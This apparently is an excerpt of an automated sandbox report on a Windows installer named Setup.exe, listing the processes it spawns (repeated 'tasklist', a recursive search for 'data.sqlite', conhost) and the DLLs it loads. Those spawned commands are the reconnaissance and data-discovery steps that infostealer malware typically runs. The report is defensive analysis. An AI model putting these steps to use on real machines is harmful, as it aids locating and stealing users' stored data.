Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . data.sqlite	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1648 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2304 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kbdus.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
